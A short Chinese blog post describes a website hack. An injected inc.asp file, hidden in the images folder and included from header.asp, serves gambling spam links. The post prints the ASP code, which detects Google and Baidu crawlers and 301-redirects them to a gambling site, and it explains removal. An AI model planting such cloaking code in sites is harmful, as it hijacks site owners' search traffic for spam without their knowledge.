网站挂黑链竟然将inc.asp放在images文件夹下

网站挂黑链居然将inc.asp放在images文件夹下

黑链的内容如下:

飞速博彩网站,博彩风云,博彩网站,线上赌博等博彩通评级机构 www.feisubcw.com 博彩网|博彩|博彩网站|博彩风云|线上赌博|博彩通|飞速博彩网站 飞速...

 

将找到的inc.asp删除再用站长工具检测

检测工具网址:http://tool.chinaz.com/Tools/webcheck.aspx

被黑网站打开主页正常但用检测工具检测及收录均不正常,均为黑链的内容。

网站挂黑链竟然将inc.asp放在images文件夹下

网站挂黑链竟然将inc.asp放在images文件夹下

 

inc.asp 包含在首页的头文件header.asp中。

<!--#include file="images/inc.asp"-->

 

网站挂黑链竟然将inc.asp放在images文件夹下

 

inc.asp内容如下:

<center>
<%
function Getbot()
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT")
if instr(1,s_agent,"googlebot",1) > 0 then
GetBot="google"
end if
if instr(1,s_agent,"baiduspider",1) > 0 then
GetBot="baidu"
end if
end function
if GetBot="baidu" or GetBot="google" then
 
url="http://www.tushanbet.com/seo/3.html"

Response.Status = "301 Moved Permanently" 

Response.AddHeader "Location", url

Response.Write""
else
Response.Write""
end if
%>
</center>


网站挂黑链竟然将inc.asp放在images文件夹下